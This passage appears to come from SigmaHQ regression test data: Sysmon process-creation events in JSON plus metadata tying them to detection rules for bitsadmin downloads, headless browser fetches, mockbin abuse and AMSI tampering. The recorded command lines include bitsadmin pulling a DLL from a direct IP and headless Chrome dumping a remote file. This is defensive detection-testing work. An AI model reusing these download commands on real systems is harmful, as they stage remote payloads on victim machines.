\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/info.yml",
    "content": "id: 242d26e0-1ce5-4a34-960d-144f34f60e37\ndescription: N/A\ndate: 2025-12-25\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981\n      title: Windows AMSI Related Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_amsi_registry_tampering/7dbbcac2-57a0-45ac-b306-ff30a8bd2981.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:33:20.562782Z\"\n        }\n      },\n      \"EventRecordID\": 18463,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:33:20.557\",\n      \"ProcessGuid\": \"0197231E-F810-6938-B710-000000000800\",\n      \"ProcessId\": 7732,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://www.atomicredteam.io/atomic-red-team/atomics/T1218.011 hello.html\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml",
    "content": "id: 83c4dfac-7b5b-4a0e-803e-cca15c933c5e\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede\n      title: File Download Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:44:13.414345Z\"\n        }\n      },\n      \"EventRecordID\": 18552,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:44:13.371\",\n      \"ProcessGuid\": \"0197231E-FA9D-6938-D910-000000000800\",\n      \"ProcessId\": 9532,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://12.34.45.67/calc.dll C:\\\\Users\\\\Public\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml",
    "content": "id: 3e393301-93d2-4759-b4d6-b957bdc0ae32\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 99c840f2-2012-46fd-9141-c761987550ef\n      title: Suspicious Download From Direct IP Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:47:28.250802Z\"\n        }\n      },\n      \"EventRecordID\": 18580,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:47:28.224\",\n      \"ProcessGuid\": \"0197231E-FB60-6938-DD10-000000000800\",\n      \"ProcessId\": 8924,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1047/bin/calc.dll C:\\\\Users\\\\Public\\\\Music\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml",
    "content": "id: 4788a4ef-6b50-4b68-9d10-d5471bd5fa02\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c\n      title: Suspicious Download From File-Sharing Website Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:22:10.216650Z\"\n        }\n      },\n      \"EventRecordID\": 18325,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:22:10.201\",\n      \"ProcessGuid\": \"0197231E-F572-6938-8B10-000000000800\",\n      \"ProcessId\": 13808,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml",
    "content": "id: 7149a708-0d83-4917-8478-24e682260b6f\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200\n      title: File With Suspicious Extension Downloaded Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:29:18.813904Z\"\n        }\n      },\n      \"EventRecordID\": 18412,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:29:18.786\",\n      \"ProcessGuid\": \"0197231E-F71E-6938-AE10-000000000800\",\n      \"ProcessId\": 4432,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\\\Users\\\\Public\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml",
    "content": "id: 5e620f3d-549d-4515-ae46-981d30ac4683\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 2ddef153-167b-4e89-86b6-757a9e65dcac\n      title: File Download Via Bitsadmin To A Suspicious Target Folder\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:20:06.319147Z\"\n        }\n      },\n      \"EventRecordID\": 32822341,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:20:06.307\",\n      \"ProcessGuid\": \"5AA13A44-ACA6-68FE-DE5D-000000004002\",\n      \"ProcessId\": 9184,\n      \"Image\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n      \"FileVersion\": \"141.0.7390.123\",\n      \"Description\": \"Google Chrome\",\n      \"Product\": \"Google Chrome\",\n      \"Company\": \"Google LLC\",\n      \"OriginalFileName\": \"chrome.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"  --headless --enable-logging --disable-gpu --dump-dom \\\"http://10.0.1.14/nas.txt\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml",
    "content": "id: 941b970d-535f-4543-8985-768e589fa8ff\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e\n      title: File Download with Headless Browser\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:25:03.181097Z\"\n        }\n      },\n      \"EventRecordID\": 32923086,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:25:03.169\",\n      \"ProcessGuid\": \"5AA13A44-ADCF-68FE-295E-000000004002\",\n      \"ProcessId\": 4788,\n      \"Image\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n      \"FileVersion\": \"141.0.7390.123\",\n      \"Description\": \"Google Chrome\",\n      \"Product\": \"Google Chrome\",\n      \"Company\": \"Google LLC\",\n      \"OriginalFileName\": \"chrome.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"  --load-extension=\\\"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\HHe2lr\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml",
    "content": "id: e159e6ce-c717-4a38-af44-ff8c4f011c37\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21\n      title: Chromium Browser Instance Executed With Custom Extension\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:28:43.862519Z\"\n        }\n      },\n      \"EventRecordID\": 32995046,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:28:43.810\",\n      \"ProcessGuid\": \"5AA13A44-AEAB-68FE-435E-000000004002\",\n      \"ProcessId\": 5784,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n      \"FileVersion\": \"141.0.3537.99\",\n      \"Description\": \"Microsoft Edge\",\n      \"Product\": \"Microsoft Edge\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"msedge.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\"   --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml",
    "content": "id: 686da1dd-caec-47d8-a254-07ab54f1f3c7\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 1c526788-0abe-4713-862f-b520da5e5316\n      title: Chromium Browser Headless Execution To Mockbin Like Site\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json",
